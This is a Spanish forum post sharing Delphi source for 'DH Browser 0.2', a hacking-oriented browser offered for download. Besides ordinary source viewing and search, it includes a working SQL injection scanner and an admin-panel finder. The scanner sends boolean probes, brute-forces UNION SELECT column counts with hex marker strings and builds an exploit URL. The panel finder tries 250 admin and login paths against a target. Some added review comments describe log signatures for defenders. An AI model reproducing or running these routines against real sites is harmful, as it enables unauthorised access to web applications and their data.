Un browser simple que hice en Delphi con las siguientes opciones:
[+] Podés ver el código HTML de la página cargada
[+] Se pueden buscar palabras en el código HTML
[+] Se pueden modificar los headers para HTTP header injection
[+] Trae un SQLI Scanner para buscar vulnerabilidades SQLI
[+] Trae un PanelFinder para buscar el panel del admin
Unas imagenes :
El codigo :
Carga
Navegador
Si lo quieren bajar lo pueden hacer de aca.
[+] Podés ver el código HTML de la página cargada
[+] Se pueden buscar palabras en el código HTML
[+] Se pueden modificar los headers para HTTP header injection
[+] Trae un SQLI Scanner para buscar vulnerabilidades SQLI
[+] Trae un PanelFinder para buscar el panel del admin
Unas imagenes :
El codigo :
Carga
Código:
// DH Browser 0.2
// (C) Doddy Hackman 2013
unit dhbrowse;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, acPNG, ExtCtrls, ComCtrls, acProgressBar, sGroupBox,
sSkinManager;
type
// Start-up form of the program: it shows a progress bar driven by Timer1 and
// then hands over to Form2 (declared in unit "programa").
// The component fields below are presumably bound to the matching .dfm
// resource (see the {$R *.dfm} directive) - confirm before renaming any.
TForm1 = class(TForm)
sGroupBox1: TsGroupBox;
sProgressBar1: TsProgressBar; // progress indicator advanced by Timer1Timer
Timer1: TTimer; // fires Timer1Timer, which runs the loading sequence
Image1: TImage;
sSkinManager1: TsSkinManager; // skin settings are applied in FormCreate
procedure Button1Click(Sender: TObject); // shows Form2 directly
procedure Timer1Timer(Sender: TObject); // fills the bar, then hides Form1 and shows Form2
procedure FormCreate(Sender: TObject); // loads the skin from <exe dir>\Data
private
{ Private declarations }
public
{ Public declarations }
end;
var
// Global instance of the start-up form, referenced by name in Timer1Timer.
Form1: TForm1;
implementation
uses programa;
{$R *.dfm}
// Click handler: opens the main browser window (Form2).
// Sender is not used.
procedure TForm1.Button1Click(Sender: TObject);
begin
  Form2.Show;
end;
// Form start-up: points the skin manager at the "Data" folder that sits next
// to the executable, selects the 'tv-b' skin and switches skinning on.
procedure TForm1.FormCreate(Sender: TObject);
var
  skinFolder: string;
begin
  // The skin files are resolved relative to the executable, not the current
  // working directory.
  skinFolder := ExtractFilePath(Application.ExeName) + 'Data';
  sSkinManager1.SkinDirectory := skinFolder;
  sSkinManager1.SkinName := 'tv-b';
  sSkinManager1.Active := True;
end;
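// Timer handler that plays the loading sequence: the progress bar is advanced
// by 10 once per second until it reaches 100, then this form is hidden and the
// main window (Form2) is shown.
//
// Changes from the previous version:
//  * the loop was declared as 1..100 although it always left after ten steps;
//    it now runs exactly until the bar is full;
//  * the handler used to leave through Abort, i.e. by raising a silent EAbort
//    exception as control flow; it now returns normally;
//  * the timer is switched off before the long-running loop instead of after
//    it, so the sequence cannot be started a second time.
//
// NOTE(review): the handler still blocks the UI thread for about ten seconds
// (Sleep inside the loop); Update only repaints the form between steps.
procedure TForm1.Timer1Timer(Sender: TObject);
const
  StepSize = 10;
  FullBar = 100;
var
  total: integer;
begin
  Timer1.Enabled := False;

  sProgressBar1.Min := 0;
  sProgressBar1.Max := FullBar;

  total := 0;
  while total < FullBar do
  begin
    Update; // repaint the form so the bar movement is visible
    Sleep(1000);
    Inc(total, StepSize);
    sProgressBar1.Position := total;
  end;

  Hide;
  Form2.Show;
end;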
end.
// The End ?
Código:
// DH Browser 0.2
// (C) Doddy Hackman 2013
// Credits :
// Navigate based on : http://www.swissdelphicenter.ch/torry/showcode.php?id=2242
// FindText based on : http://delphi.cjcsoft.net/viewthread.php?tid=47143
// Get HTML based on : http://delphi.about.com/od/adptips2005/qt/webbrowserhtml.htm
unit programa;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, sSkinManager, StdCtrls, sButton, sEdit, OleCtrls, SHDocVw, sMemo,
sListBox, sGroupBox, sLabel, sCheckBox, ComCtrls, sStatusBar, acPNG,
ExtCtrls, mshtml, Menus, PerlRegEx, IdBaseComponent, IdComponent,
IdTCPConnection, IdTCPClient, IdHTTP, acProgressBar;
type
// Main window: an embedded browser plus the HTML source view, the custom
// header box, the SQLI scanner and the panel finder.
// The component fields below are presumably bound to the matching .dfm
// resource (see the {$R *.dfm} directive) - confirm before renaming any.
TForm2 = class(TForm)
sSkinManager1: TsSkinManager; // skin settings are applied in FormCreate
sGroupBox1: TsGroupBox;
sEdit1: TsEdit; // URL box; also overwritten with the result by the scanner and the panel finder
sButton1: TsButton;
sGroupBox2: TsGroupBox;
sMemo1: TsMemo; // extra request headers, sent only when sCheckBox1 is checked
sCheckBox1: TsCheckBox; // enables the custom headers from sMemo1
sGroupBox3: TsGroupBox;
sStatusBar1: TsStatusBar; // Panels[0] carries the progress messages
WebBrowser1: TWebBrowser; // embedded browser control
sGroupBox4: TsGroupBox;
sButton2: TsButton;
sButton3: TsButton;
sGroupBox5: TsGroupBox;
sButton4: TsButton;
sLabel1: TsLabel;
Image1: TImage;
sMemo2: TsMemo; // HTML source of the loaded page (filled in WebBrowser1DownloadComplete)
PopupMenu1: TPopupMenu;
S1: TMenuItem; // switches to the source view
S2: TMenuItem; // switches back to the rendered page
IdHTTP1: TIdHTTP; // HTTP client used by the SQLI scanner
PerlRegEx1: TPerlRegEx; // regex engine used by the SQLI scanner
FindDialog1: TFindDialog; // search dialog for the source view
sProgressBar1: TsProgressBar; // page load progress
procedure sButton1Click(Sender: TObject); // navigate to the URL in sEdit1
procedure S1Click(Sender: TObject);
procedure S2Click(Sender: TObject);
procedure sButton3Click(Sender: TObject); // panel finder
procedure sButton2Click(Sender: TObject); // SQLI scanner
procedure sButton4Click(Sender: TObject); // opens FindDialog1
procedure FindDialog1Find(Sender: TObject);
procedure FormClose(Sender: TObject; var Action: TCloseAction);
procedure WebBrowser1ProgressChange(ASender: TObject;
Progress, ProgressMax: Integer);
procedure WebBrowser1DownloadComplete(Sender: TObject);
procedure FormCreate(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
// Global instance of the main window; unit dhbrowse shows it by this name.
Form2: TForm2;
implementation
{$R *.dfm}
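procedure TForm2.FindDialog1Find(Sender: TObject);
// FindText based on : http://delphi.cjcsoft.net/viewthread.php?tid=47143
//
// Searches the HTML source shown in sMemo2 for the dialog's FindText, starting
// right after the current selection, and selects the next occurrence. The
// search is case-sensitive and does not wrap around. Focus goes back to the
// memo whether or not a match was found.
//
// Memory-safety fixes over the previous PChar/GetMem version:
//  * both buffers were allocated with GetMem and never released, so every
//    search leaked the whole page source plus the search text;
//  * the buffer length was held in a Word, so a page source longer than
//    65535 characters wrapped to a small value, the copy was truncated and
//    the start pointer (SelStart + SelLength) could land past the end of the
//    allocation;
//  * GetMem takes a size in bytes while the copy is made in characters; on
//    Delphi versions where PChar is a two-byte character this writes past the
//    end of both buffers.
// The page content comes from whatever site was loaded, so these sizes are
// not under the program's control. Managed strings remove all three issues.
var
  needle: string;
  haystack: string;
  startAt: Integer; // 1-based index of the first character to search
  hit: Integer;     // 1-based position inside the searched tail, 0 = no match
begin
  needle := (Sender as TFindDialog).FindText;
  haystack := sMemo2.Text;

  startAt := sMemo2.SelStart + sMemo2.SelLength + 1;
  hit := Pos(needle, Copy(haystack, startAt, MaxInt));

  if hit > 0 then
  begin
    // SelStart is 0-based: (startAt - 1) + (hit - 1).
    sMemo2.SelStart := startAt + hit - 2;
    sMemo2.SelLength := Length(needle);
  end;

  sMemo2.SetFocus;
end;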
// Closing the main window ends the whole program. The start-up form is only
// hidden, not closed, so the application is terminated explicitly here.
// Action is left untouched.
procedure TForm2.FormClose(Sender: TObject; var Action: TCloseAction);
begin
  Application.Terminate;
end;
// Form start-up: points the skin manager at the "Data" folder that sits next
// to the executable, selects the 'tv-b' skin and switches skinning on.
procedure TForm2.FormCreate(Sender: TObject);
var
  skinFolder: string;
begin
  // The skin files are resolved relative to the executable, not the current
  // working directory.
  skinFolder := ExtractFilePath(Application.ExeName) + 'Data';
  sSkinManager1.SkinDirectory := skinFolder;
  sSkinManager1.SkinName := 'tv-b';
  sSkinManager1.Active := True;
end;
// Menu handler: switches to the source view by hiding the browser control and
// showing the memo that holds the page's HTML.
procedure TForm2.S1Click(Sender: TObject);
const
  SourceView = True;
begin
  WebBrowser1.Visible := not SourceView;
  sMemo2.Visible := SourceView;
end;
// Menu handler: switches back to the rendered page by showing the browser
// control and hiding the HTML source memo.
procedure TForm2.S2Click(Sender: TObject);
const
  SourceView = False;
begin
  WebBrowser1.Visible := not SourceView;
  sMemo2.Visible := SourceView;
end;
procedure TForm2.sButton1Click(Sender: TObject);
// Navigate based on : http://www.swissdelphicenter.ch/torry/showcode.php?id=2242
//
// Loads the URL typed in sEdit1 into the embedded browser, bypassing the cache
// for both reading and writing. When sCheckBox1 is ticked, the text of sMemo1
// is passed as the additional request headers exactly as typed; otherwise no
// extra headers are sent.
var
  flags: OLEVariant;
  targetFrame: OLEVariant;
  postData: OLEVariant;
  extraHeaders: OLEVariant;
begin
  flags := navNoReadFromCache or navNoWriteToCache;
  targetFrame := '';
  postData := '';

  if sCheckBox1.Checked then
    extraHeaders := sMemo1.Text
  else
    extraHeaders := '';

  WebBrowser1.Navigate(sEdit1.Text, flags, targetFrame, postData, extraHeaders);
end;
procedure TForm2.sButton2Click(Sender: TObject);
// "SQLI Scanner" button. Appends fixed SQL fragments to the URL in sEdit1,
// fetches the results with IdHTTP1 and compares the responses. If the two
// first responses differ, it requests UNION SELECT lists of growing length
// (2 to 36 entries) and looks for the marker K0BRA<n>K0BRA in the response.
// On a match sEdit1.Text is replaced with a generated URL and the handler
// leaves through Abort.
//
// Seen from the server side: every request carries the same literal strings
// ('+and+1=1--', '+union+select+', 'concat(0x4b30425241,'), so the traffic is
// easy to match in access logs or request filters; a burst of up to 37 such
// GETs against one parameter is the pattern to look for. Queries built with
// bound parameters do not react to these inputs.
//
// NOTE(review): all requests run synchronously inside the click handler, so
// the window does not process input while the scan runs.
// NOTE(review): no exception handling is visible around the IdHTTP1.Get calls;
// a failed request leaves the handler with the status text unchanged.
var
pass1: string;
pass2: string;
code: string;
urltest: string;
urlgen: string;
full: string;
codedos: string;
i: Integer;
begin
sStatusBar1.Panels[0].Text := '[+] SQLI Scanning ...';
Form2.sStatusBar1.Update;
pass1 := '+'; // separator placed between the appended words
pass2 := '--'; // suffix appended to every generated URL
// NOTE(review): this value is never read; urltest is reassigned below before
// its first use.
urltest := 'concat(0x4b30425241,1,0x4b30425241)';
sStatusBar1.Panels[0].Text := '[+] Checking ...';
Form2.sStatusBar1.Update;
// Two requests that differ only in '1=1' versus '1=0'; the bodies are
// compared as plain strings.
code := IdHTTP1.Get
(sEdit1.Text + '1' + pass1 + 'and' + pass1 + '1=1' + pass2);
codedos := IdHTTP1.Get
(sEdit1.Text + '1' + pass1 + 'and' + pass1 + '1=0' + pass2);
if not(code = codedos) then
begin
sStatusBar1.Panels[0].Text := '[+] Finding columns number';
Form2.sStatusBar1.Update;
// urltest accumulates the marker-wrapped list that is actually requested;
// urlgen accumulates the plain numbered list used for the final URL.
urltest := '1' + pass1 + 'and' + pass1 + '1=0' + pass1 + 'union' + pass1 +
'select' + pass1 + 'concat(0x4b30425241,1,0x4b30425241)';
urlgen := '1';
for i := 2 to 36 do
begin
sStatusBar1.Panels[0].Text := '[+] Columns Length : ' + IntToStr(i);
Form2.sStatusBar1.Update;
urltest := urltest + ',concat(0x4b30425241,' + IntToStr(i)
+ ',0x4b30425241)';
urlgen := urlgen + ',' + IntToStr(i);
code := IdHTTP1.Get(sEdit1.Text + urltest + pass2);
// 0x4b30425241 is the hex form of the ASCII text 'K0BRA'; the regex picks
// up whatever the page printed between two such markers.
PerlRegEx1.Regex := 'K0BRA(.*?)K0BRA';
PerlRegEx1.Subject := code;
if PerlRegEx1.Match then
begin
// Only the first occurrence of the captured text is replaced (empty flag
// set), so a captured '1' also matches inside '10', '11', ...
urlgen := StringReplace(urlgen, PerlRegEx1.SubExpressions[1],
'hackman', []);
full := sEdit1.Text + '1' + pass1 + 'and' + pass1 + '1=0' + pass1 +
'union' + pass1 + 'select' + pass1 + urlgen;
sEdit1.Text := full;
// Abort raises the silent EAbort exception: the '[+] Done' status below is
// skipped and the last '[+] Columns Length' text stays visible.
Abort;
end;
end;
end;
sStatusBar1.Panels[0].Text := '[+] Done';
Form2.sStatusBar1.Update;
end;
procedure TForm2.sButton3Click(Sender: TObject);
// "PanelFinder" button. Requests sEdit1.Text + '/' + <entry> for each entry of
// the built-in path list, in order, and stops at the first one answered with
// HTTP status 200; that URL is then written back into sEdit1.
//
// Seen from the server side: one client requesting this fixed sequence of
// admin/login-style paths in quick succession, almost all of them answered
// with an error status, is a clear signature in access logs and a natural
// target for rate limiting.
//
// NOTE(review): the TIdHTTP object created below is never freed in this
// routine, so each click leaks one instance.
// NOTE(review): both exception handlers are empty, so connection errors and
// error status codes are indistinguishable from "path not present".
// NOTE(review): the requests run synchronously inside the click handler.
const
paginas: array [1 .. 250] of string = ('admin/admin.asp', 'admin/login.asp',
'admin/index.asp', 'admin/admin.aspx', 'admin/login.aspx',
'admin/index.aspx', 'admin/webmaster.asp', 'admin/webmaster.aspx',
'asp/admin/index.asp', 'asp/admin/index.aspx', 'asp/admin/admin.asp',
'asp/admin/admin.aspx', 'asp/admin/webmaster.asp',
'asp/admin/webmaster.aspx', 'admin/', 'login.asp', 'login.aspx',
'admin.asp', 'admin.aspx', 'webmaster.aspx', 'webmaster.asp',
'login/index.asp', 'login/index.aspx', 'login/login.asp',
'login/login.aspx', 'login/admin.asp', 'login/admin.aspx',
'administracion/index.asp', 'administracion/index.aspx',
'administracion/login.asp', 'administracion/login.aspx',
'administracion/webmaster.asp', 'administracion/webmaster.aspx',
'administracion/admin.asp', 'administracion/admin.aspx', 'php/admin/',
'admin/admin.php', 'admin/index.php', 'admin/login.php',
'admin/system.php', 'admin/ingresar.php', 'admin/administrador.php',
'admin/default.php', 'administracion/', 'administracion/index.php',
'administracion/login.php', 'administracion/ingresar.php',
'administracion/admin.php', 'administration/', 'administration/index.php',
'administration/login.php', 'administrator/index.php',
'administrator/login.php', 'administrator/system.php', 'system/',
'system/login.php', 'admin.php', 'login.php', 'administrador.php',
'administration.php', 'administrator.php', 'admin1.html', 'admin1.php',
'admin2.php', 'admin2.html', 'yonetim.php', 'yonetim.html', 'yonetici.php',
'yonetici.html', 'adm/', 'admin/account.php', 'admin/account.html',
'admin/index.html', 'admin/login.html', 'admin/home.php',
'admin/controlpanel.html', 'admin/controlpanel.php', 'admin.html',
'admin/cp.php', 'admin/cp.html', 'cp.php', 'cp.html', 'administrator/',
'administrator/index.html', 'administrator/login.html',
'administrator/account.html', 'administrator/account.php',
'administrator.html', 'login.html', 'modelsearch/login.php',
'moderator.php', 'moderator.html', 'moderator/login.php',
'moderator/login.html', 'moderator/admin.php', 'moderator/admin.html',
'moderator/', 'account.php', 'account.html', 'controlpanel/',
'controlpanel.php', 'controlpanel.html', 'admincontrol.php',
'admincontrol.html', 'adminpanel.php', 'adminpanel.html', 'admin1.asp',
'admin2.asp', 'yonetim.asp', 'yonetici.asp', 'admin/account.asp',
'admin/home.asp', 'admin/controlpanel.asp', 'admin/cp.asp', 'cp.asp',
'administrator/index.asp', 'administrator/login.asp',
'administrator/account.asp', 'administrator.asp', 'modelsearch/login.asp',
'moderator.asp', 'moderator/login.asp', 'moderator/admin.asp',
'account.asp', 'controlpanel.asp', 'admincontrol.asp', 'adminpanel.asp',
'fileadmin/', 'fileadmin.php', 'fileadmin.asp', 'fileadmin.html',
'administration.html', 'sysadmin.php', 'sysadmin.html', 'phpmyadmin/',
'myadmin/', 'sysadmin.asp', 'sysadmin/', 'ur-admin.asp', 'ur-admin.php',
'ur-admin.html', 'ur-admin/', 'Server.php', 'Server.html', 'Server.asp',
'Server/', 'wpadmin/', 'administr8.php', 'administr8.html', 'administr8/',
'administr8.asp', 'webadmin/', 'webadmin.php', 'webadmin.asp',
'webadmin.html', 'administratie/', 'admins/', 'admins.php', 'admins.asp',
'admins.html', 'administrivia/', 'Database_Administration/', 'WebAdmin/',
'useradmin/', 'sysadmins/', 'admin1/', 'systemadministration/',
'administrators/', 'pgadmin/', 'directadmin/', 'staradmin/',
'ServerAdministrator/', 'SysAdmin/', 'administer/', 'LiveUser_Admin/',
'sysadmin/', 'typo3/', 'panel/', 'cpanel/', 'cPanel/', 'cpanel_file/',
'platz_login/', 'rcLogin/', 'blogindex/', 'formslogin/', 'autologin/',
'support_login/', 'meta_login/', 'manuallogin/', 'simpleLogin/',
'loginflat/', 'utility_login/', 'showlogin/', 'memlogin/', 'members/',
'login-redirect/', 'sublogin/', 'wplogin/', 'login1/', 'dirlogin/',
'login_db/', 'xlogin/', 'smblogin/', 'customer_login/', 'UserLogin/',
'loginus/', 'acct_login/', 'admin_area/', 'bigadmin/', 'project-admins/',
'phppgadmin/', 'pureadmin/', 'sqladmin/', 'radmind/', 'openvpnadmin/',
'wizmysqladmin/', 'vadmind/', 'ezsqliteadmin/', 'hpwebjetadmin/',
'newsadmin/', 'adminpro/', 'Lotus_Domino_Admin/', 'bbadmin/',
'vmailadmin/', 'Indy_admin/', 'ccp14admin/', 'irc-macadmin/',
'banneradmin/', 'sshadmin/', 'phpldapadmin/', 'macadmin/',
'administratoraccounts/', 'admin4_account/', 'admin4_colon/', 'radmind1/',
'SuperAdmin/', 'AdminTools/', 'cmsadmin/', 'SysAdmin2/', 'globes_admin/',
'cadmins/', 'phpSQLiteAdmin/', 'navSiteAdmin/', 'server_admin_small/',
'logo_sysadmin/', 'server/', 'database_administration/', 'power_user/',
'system_administration/', 'ss_vms_admin_sm/');
var
IdHTTP: TIdHTTP;
i: Integer;
control: Integer; // 0 while searching, 1 once a path answered with 200
begin
control := 0;
sStatusBar1.Panels[0].Text := '[+] Finding Panel ....';
Form2.sStatusBar1.Update;
// A private HTTP client is used here instead of the form's IdHTTP1.
IdHTTP := TIdHTTP.Create(nil);
for i := Low(paginas) to High(paginas) do
if (control = 1) then
begin
// A hit was recorded in the previous iteration: leave through the silent
// EAbort exception, which also skips the status update after the loop.
Abort;
end
else
begin
try
sStatusBar1.Panels[0].Text := '[+] Testing : ' + paginas[i];
Form2.sStatusBar1.Update;
IdHTTP.Get(sEdit1.Text + '/' + paginas[i]);
if IdHTTP.ResponseCode = 200 then
begin
sStatusBar1.Panels[0].Text := '[+] Done';
Form2.sStatusBar1.Update;
sEdit1.Text := sEdit1.Text + '/' + paginas[i];
control := 1;
end;
except
// Both handlers are intentionally empty in the original: any failure simply
// moves on to the next path.
on E: EIdHttpProtocolException do
;
on E: Exception do
;
end;
end;
sStatusBar1.Panels[0].Text := '[+] Done';
Form2.sStatusBar1.Update;
end;
// Click handler: opens the find dialog; the search itself is carried out in
// FindDialog1Find. The result of Execute is not inspected.
procedure TForm2.sButton4Click(Sender: TObject);
begin
  FindDialog1.Execute;
end;
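// Browser event: a download has finished. Resets the progress bar and copies
// the HTML of the loaded document into sMemo2 (shown as plain text, not
// rendered).
//
// Get HTML based on : http://delphi.about.com/od/adptips2005/qt/webbrowserhtml.htm
//
// Changes from the previous version:
//  * the expected "nothing to show" cases - no document yet, a document that
//    is not HTML, a document without a body - are checked explicitly instead
//    of being left to raise and fall into an empty except block;
//  * any remaining failure of the browser control is reported in the status
//    bar rather than discarded, and the memo simply stays empty.
procedure TForm2.WebBrowser1DownloadComplete(Sender: TObject);
var
  doc: IHTMLDocument2;
  buscador: IHTMLElement;
begin
  sProgressBar1.Position := 0;
  try
    sMemo2.Clear;

    // Document is nil before the first navigation and is not an HTML document
    // when the control hosts another content type.
    if not Supports(WebBrowser1.Document, IHTMLDocument2, doc) then
      Exit;

    buscador := doc.body;
    if buscador = nil then
      Exit;

    // Walk up from <body> to the root element so that the whole page,
    // including <head>, is captured.
    while buscador.parentElement <> nil do
      buscador := buscador.parentElement;

    sMemo2.Lines.Add(buscador.outerHTML);
  except
    on E: Exception do
      sStatusBar1.Panels[0].Text := '[-] HTML source unavailable : ' + E.Message;
  end;
end;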
// Browser event: mirrors the control's load progress on the progress bar.
// The upper bound is set first, then the current position.
procedure TForm2.WebBrowser1ProgressChange(ASender: TObject; Progress, ProgressMax: Integer);
begin
  sProgressBar1.Max := ProgressMax;
  sProgressBar1.Position := Progress;
end;
end.
// The End ?
Si lo quieren bajar lo pueden hacer de aca.